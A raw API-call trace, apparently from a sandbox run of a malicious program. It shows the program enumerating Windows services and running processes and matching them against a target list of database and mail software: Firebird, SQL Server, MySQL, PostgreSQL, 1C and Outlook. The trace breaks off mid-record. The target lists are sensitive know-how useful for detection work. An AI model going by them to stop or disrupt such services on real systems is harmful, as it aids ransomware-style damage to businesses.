[0032.158] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0032.158] lstrlenW (lpString="CscService") returned 10 [0032.158] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0032.158] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0032.158] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0032.158] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0032.158] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0032.158] lstrlenW (lpString="DcomLaunch") returned 10 [0032.158] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0032.158] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0032.158] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0032.158] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0032.158] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0032.158] lstrlenW (lpString="Dhcp") returned 4 [0032.159] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0032.159] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0032.159] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0032.159] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0032.159] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0032.159] lstrlenW (lpString="Dnscache") returned 8 [0032.159] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0032.159] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0032.159] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0032.159] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0032.159] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0032.159] lstrlenW (lpString="DPS") returned 3 [0032.159] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0032.159] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0032.159] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0032.159] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0032.159] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0032.159] lstrlenW (lpString="eventlog") returned 8 [0032.159] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0032.159] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0032.159] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0032.159] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0032.159] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0032.159] lstrlenW (lpString="EventSystem") returned 11 [0032.159] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0032.159] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0032.159] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0032.159] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0032.159] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0032.159] lstrlenW (lpString="gpsvc") returned 5 [0032.159] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0032.159] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0032.159] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0032.159] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0032.159] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0032.160] lstrlenW (lpString="iphlpsvc") returned 8 [0032.160] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0032.160] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0032.160] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0032.160] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0032.160] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0032.160] lstrlenW (lpString="LanmanServer") returned 12 [0032.160] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0032.160] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0032.160] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0032.160] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0032.160] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0032.160] lstrlenW (lpString="LanmanWorkstation") returned 17 [0032.160] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0032.160] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0032.160] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0032.160] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0032.160] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0032.160] lstrlenW (lpString="lmhosts") returned 7 [0032.160] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0032.160] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0032.160] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0032.160] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0032.160] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0032.160] lstrlenW (lpString="MMCSS") returned 5 [0032.160] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0032.160] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0032.160] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0032.160] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0032.160] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0032.160] lstrlenW (lpString="MpsSvc") returned 6 [0032.160] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0032.160] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0032.160] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0032.160] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0032.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0032.161] lstrlenW (lpString="Netman") returned 6 [0032.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0032.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0032.161] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0032.161] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0032.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0032.161] lstrlenW (lpString="netprofm") returned 8 [0032.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0032.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0032.161] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0032.161] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0032.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0032.161] lstrlenW (lpString="NlaSvc") returned 6 [0032.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0032.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0032.161] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0032.161] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0032.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0032.161] lstrlenW (lpString="nsi") returned 3 [0032.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0032.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0032.161] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0032.161] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0032.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0032.161] lstrlenW (lpString="PcaSvc") returned 6 [0032.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0032.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0032.161] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0032.161] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0032.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0032.161] lstrlenW (lpString="PlugPlay") returned 8 [0032.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0032.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0032.161] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0032.161] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0032.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0032.162] lstrlenW (lpString="Power") returned 5 [0032.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0032.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0032.162] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0032.162] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0032.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0032.162] lstrlenW (lpString="ProfSvc") returned 7 [0032.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0032.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0032.162] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0032.162] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0032.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0032.162] lstrlenW (lpString="RpcEptMapper") returned 12 [0032.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0032.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0032.162] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0032.162] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0032.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0032.162] lstrlenW (lpString="RpcSs") returned 5 [0032.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0032.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0032.162] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0032.162] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0032.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0032.162] lstrlenW (lpString="SamSs") returned 5 [0032.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0032.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0032.162] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0032.162] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0032.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0032.162] lstrlenW (lpString="Schedule") returned 8 [0032.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0032.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0032.162] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0032.163] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0032.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0032.163] lstrlenW (lpString="SENS") returned 4 [0032.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0032.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0032.163] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0032.163] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0032.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0032.163] lstrlenW (lpString="ShellHWDetection") returned 16 [0032.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0032.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0032.163] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0032.163] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0032.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0032.163] lstrlenW (lpString="Spooler") returned 7 [0032.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0032.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0032.163] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0032.163] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0032.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0032.163] lstrlenW (lpString="SysMain") returned 7 [0032.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0032.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0032.163] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0032.163] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0032.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0032.163] lstrlenW (lpString="Themes") returned 6 [0032.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0032.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0032.163] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0032.163] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0032.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0032.163] lstrlenW (lpString="TrkWks") returned 6 [0032.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0032.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0032.163] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0032.164] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0032.164] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0032.164] lstrlenW (lpString="UxSms") returned 5 [0032.164] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0032.164] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0032.164] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0032.164] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0032.164] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0032.164] lstrlenW (lpString="WdiServiceHost") returned 14 [0032.164] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0032.164] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0032.164] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0032.164] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0032.164] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0032.164] lstrlenW (lpString="WdiSystemHost") returned 13 [0032.164] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0032.164] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0032.164] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0032.164] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0032.164] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0032.164] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0032.164] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0032.164] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0032.164] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0032.164] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0032.164] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0032.164] lstrlenW (lpString="Winmgmt") returned 7 [0032.164] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0032.164] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0032.164] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0032.164] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0032.164] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0032.164] lstrlenW (lpString="WPDBusEnum") returned 10 [0032.164] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0032.164] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0032.165] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0032.165] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0032.165] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0032.165] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xba4bf0 | out: hHeap=0xb10000) returned 1 [0032.165] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x110 [0032.167] Process32FirstW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0032.167] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0032.168] lstrlenW (lpString="System") returned 6 [0032.168] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0032.168] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0032.168] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0032.168] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0032.168] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0032.168] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0032.168] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0032.168] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0032.168] lstrlenW (lpString="smss.exe") returned 8 [0032.169] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0032.169] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0032.169] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0032.169] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0032.169] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0032.169] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0032.169] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0032.169] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0032.170] lstrlenW (lpString="csrss.exe") returned 9 [0032.170] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0032.170] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0032.170] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0032.170] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0032.170] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0032.170] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0032.170] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0032.170] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0032.170] lstrlenW (lpString="wininit.exe") returned 11 [0032.170] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0032.170] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0032.171] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0032.171] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0032.171] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0032.171] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0032.171] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0032.171] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0032.171] lstrlenW (lpString="csrss.exe") returned 9 [0032.171] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0032.171] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0032.171] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0032.171] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0032.171] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0032.171] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0032.172] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0032.172] lstrlenW (lpString="winlogon.exe") returned 12 [0032.172] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0032.173] lstrlenW (lpString="services.exe") returned 12 [0032.173] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0032.173] lstrlenW (lpString="lsass.exe") returned 9 [0032.173] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0032.174] lstrlenW (lpString="lsm.exe") returned 7 [0032.174] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.174] lstrlenW (lpString="svchost.exe") returned 11 [0032.174] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.175] lstrlenW (lpString="svchost.exe") returned 11 [0032.175] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.176] lstrlenW (lpString="svchost.exe") returned 11 [0032.176] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.176] lstrlenW (lpString="svchost.exe") returned 11 [0032.176] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0032.177] lstrlenW (lpString="svchost.exe") returned 11 [0032.177] Process32NextW (in: hSnapshot=0x110, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, 